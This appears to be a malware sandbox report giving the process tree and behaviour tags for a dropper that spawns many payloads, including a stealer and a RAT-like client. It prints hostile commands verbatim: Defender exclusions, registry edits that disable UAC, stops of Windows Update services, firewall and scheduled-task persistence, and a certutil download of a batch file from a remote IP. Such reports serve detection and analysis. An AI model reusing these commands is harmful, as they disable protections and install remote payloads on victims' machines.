PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 2752 wrote to memory of 4380	2752	3544436.exe	84
PID 32 wrote to memory of 4636	32	XClient.exe	85
PID 32 wrote to memory of 4636	32	XClient.exe	85
PID 32 wrote to memory of 3380	32	XClient.exe	87
PID 32 wrote to memory of 3380	32	XClient.exe	87
PID 32 wrote to memory of 2428	32	XClient.exe	89
PID 32 wrote to memory of 2428	32	XClient.exe	89
PID 32 wrote to memory of 3532	32	XClient.exe	91
PID 32 wrote to memory of 3532	32	XClient.exe	91
PID 32 wrote to memory of 1008	32	XClient.exe	93
PID 32 wrote to memory of 1008	32	XClient.exe	93
PID 2004 wrote to memory of 2244	2004	4363463463464363463463463.exe	95
PID 2004 wrote to memory of 2244	2004	4363463463464363463463463.exe	95
PID 2004 wrote to memory of 2244	2004	4363463463464363463463463.exe	95
PID 2244 wrote to memory of 2708	2244	NOTallowedtocrypt.exe	96
PID 2244 wrote to memory of 2708	2244	NOTallowedtocrypt.exe	96
PID 2244 wrote to memory of 2708	2244	NOTallowedtocrypt.exe	96
PID 2708 wrote to memory of 2740	2708	cmd.exe	98
PID 2708 wrote to memory of 2740	2708	cmd.exe	98
PID 2708 wrote to memory of 2740	2708	cmd.exe	98
PID 2244 wrote to memory of 2220	2244	NOTallowedtocrypt.exe	99
PID 2244 wrote to memory of 2220	2244	NOTallowedtocrypt.exe	99
PID 2244 wrote to memory of 2220	2244	NOTallowedtocrypt.exe	99
PID 2220 wrote to memory of 2184	2220	76y5trfed675ytg.exe	100
PID 2220 wrote to memory of 2184	2220	76y5trfed675ytg.exe	100
PID 2220 wrote to memory of 2184	2220	76y5trfed675ytg.exe	100
PID 2220 wrote to memory of 1484	2220	76y5trfed675ytg.exe	101
PID 2220 wrote to memory of 1484	2220	76y5trfed675ytg.exe	101
PID 2220 wrote to memory of 1484	2220	76y5trfed675ytg.exe	101
PID 2220 wrote to memory of 1484	2220	76y5trfed675ytg.exe	101
PID 2184 wrote to memory of 3836	2184	cmd.exe	103
PID 2184 wrote to memory of 3836	2184	cmd.exe	103
PID 2184 wrote to memory of 3836	2184	cmd.exe	103
PID 1484 wrote to memory of 3400	1484	iexplore.exe	104
PID 1484 wrote to memory of 3400	1484	iexplore.exe	104
PID 1484 wrote to memory of 3400	1484	iexplore.exe	104
PID 1484 wrote to memory of 2204	1484	iexplore.exe	106
PID 1484 wrote to memory of 2204	1484	iexplore.exe	106
PID 1484 wrote to memory of 2204	1484	iexplore.exe	106
PID 1484 wrote to memory of 2204	1484	iexplore.exe	106
PID 3400 wrote to memory of 480	3400	cmd.exe	107
PID 3400 wrote to memory of 480	3400	cmd.exe	107
PID 3400 wrote to memory of 480	3400	cmd.exe	107
PID 2004 wrote to memory of 3152	2004	4363463463464363463463463.exe	109
PID 2004 wrote to memory of 3152	2004	4363463463464363463463463.exe	109
PID 2004 wrote to memory of 3152	2004	4363463463464363463463463.exe	109
PID 3152 wrote to memory of 1468	3152	GoodFrag.exe	110
PID 3152 wrote to memory of 1468	3152	GoodFrag.exe	110
PID 3152 wrote to memory of 1468	3152	GoodFrag.exe	110
PID 1468 wrote to memory of 1320	1468	Runtime Broker.exe	111
PID 1468 wrote to memory of 1320	1468	Runtime Broker.exe	111
PID 1468 wrote to memory of 1320	1468	Runtime Broker.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2652	attrib.exe
40700	Process not Found

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3216
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:32
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Wave.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Wave.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Wave" /tr "C:\Users\Admin\AppData\Roaming\Wave.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1008
- - C:\Users\Admin\AppData\Local\Temp\Files\3544436.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3544436.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4380
- - C:\Users\Admin\AppData\Local\Temp\Files\NOTallowedtocrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\NOTallowedtocrypt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2708
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2740
  - - C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
      "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2220
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2184
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3836
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1484
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3400
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:480
      - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        6⤵
        
        PID:2204
- - C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\GoodFrag.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3152
  - - C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Time Discovery
        
        PID:1320
- - C:\Users\Admin\AppData\Local\Temp\Files\m.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2820
  - - C:\Windows\sysvplervcs.exe
      C:\Windows\sysvplervcs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      PID:948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3224
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:404
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4672
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2352
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4432
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2508
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3128
    - - C:\Users\Admin\AppData\Local\Temp\2232519369.exe
        
        C:\Users\Admin\AppData\Local\Temp\2232519369.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:5760
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5692
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:5752
    - - C:\Users\Admin\AppData\Local\Temp\685410430.exe
        
        C:\Users\Admin\AppData\Local\Temp\685410430.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5788
    - - C:\Users\Admin\AppData\Local\Temp\247805573.exe
        
        C:\Users\Admin\AppData\Local\Temp\247805573.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1576
      - C:\Users\Admin\AppData\Local\Temp\2014831613.exe
        
        C:\Users\Admin\AppData\Local\Temp\2014831613.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5376
    - - C:\Users\Admin\AppData\Local\Temp\3132929399.exe
        
        C:\Users\Admin\AppData\Local\Temp\3132929399.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1824
    - - C:\Users\Admin\AppData\Local\Temp\309012054.exe
        
        C:\Users\Admin\AppData\Local\Temp\309012054.exe
        5⤵
        
        PID:11480
      - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        6⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\517116542.exe
        
        C:\Users\Admin\AppData\Local\Temp\517116542.exe
        7⤵
        
        PID:22408
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        8⤵
        
        PID:3084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        9⤵
        
        PID:20920
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        8⤵
        
        PID:19252
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        9⤵
        
        PID:18824
        
        C:\Users\Admin\AppData\Local\Temp\91909899.exe
        
        C:\Users\Admin\AppData\Local\Temp\91909899.exe
        7⤵
        
        PID:19656
        
        C:\Users\Admin\AppData\Local\Temp\266131776.exe
        
        C:\Users\Admin\AppData\Local\Temp\266131776.exe
        7⤵
        
        PID:23968
        
        C:\Users\Admin\AppData\Local\Temp\2536329432.exe
        
        C:\Users\Admin\AppData\Local\Temp\2536329432.exe
        7⤵
        
        PID:24872
- - C:\Users\Admin\AppData\Local\Temp\Files\c2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\c2.exe"
    3⤵
    - Executes dropped EXE
    PID:3920
- - C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4088
  - - C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\j4vzzuai.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 300
      4⤵
      Program crash
      PID:3528
- - C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:456
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\stealc_default.exe" & del "C:\ProgramData\*.dll"" & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:1144
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3024
- - C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Installeraus.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2220
  - - C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
      "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
      4⤵
      Sets service image path in registry
      Executes dropped EXE
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
  - - C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5404
- - C:\Users\Admin\AppData\Local\Temp\Files\r.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\r.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3904
- - C:\Users\Admin\AppData\Local\Temp\Files\wwbizsrvs.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wwbizsrvs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- - C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5644
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E4B9.tmp\E4BA.tmp\E4BB.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader.exe"
      4⤵
      PID:5896
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Access Token Manipulation: Create Process with Token
        
        PID:5924
      - C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5968
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E67E.tmp\E67F.tmp\E680.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
        7⤵
        Enumerates connected drives
        
        PID:764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:6128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:1400
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:4488
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h e:\net
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2652
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat
        8⤵
        
        PID:3184
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache * delete
        8⤵
        
        PID:1160
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "e:\net\dr\dr.bat" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1708
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 100
        8⤵
        Delays execution with timeout.exe
        
        PID:3152
- - C:\Users\Admin\AppData\Local\Temp\Files\wow.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wow.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:3864
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.funletters.net/readme.htm
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5564
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc66c13cb8,0x7ffc66c13cc8,0x7ffc66c13cd8
        5⤵
        
        PID:5584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2008 /prefetch:2
        5⤵
        
        PID:2800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
        5⤵
        
        PID:1512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:1
        5⤵
        
        PID:4636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
        5⤵
        
        PID:2300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
        5⤵
        
        PID:1048
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
        5⤵
        
        PID:1040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:1
        5⤵
        
        PID:3008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4688 /prefetch:1
        5⤵
        
        PID:5440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1996,3186938222787618007,16172909643967764467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
        5⤵
        
        PID:5860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
